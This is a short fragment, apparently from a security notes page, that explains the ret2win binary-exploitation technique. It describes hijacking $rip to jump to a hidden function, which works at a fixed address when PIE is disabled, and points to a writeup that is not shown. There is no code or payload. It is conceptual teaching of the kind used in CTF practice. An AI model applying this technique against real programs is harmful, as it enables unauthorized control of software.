Last updated 2 years ago
This attack is also called ret2win. Basically we just control $rip and then jump to some "hidden" function in the binary. If PIE is turned off, the address of this function will be fixed. Read this writeup to learn more:
$rip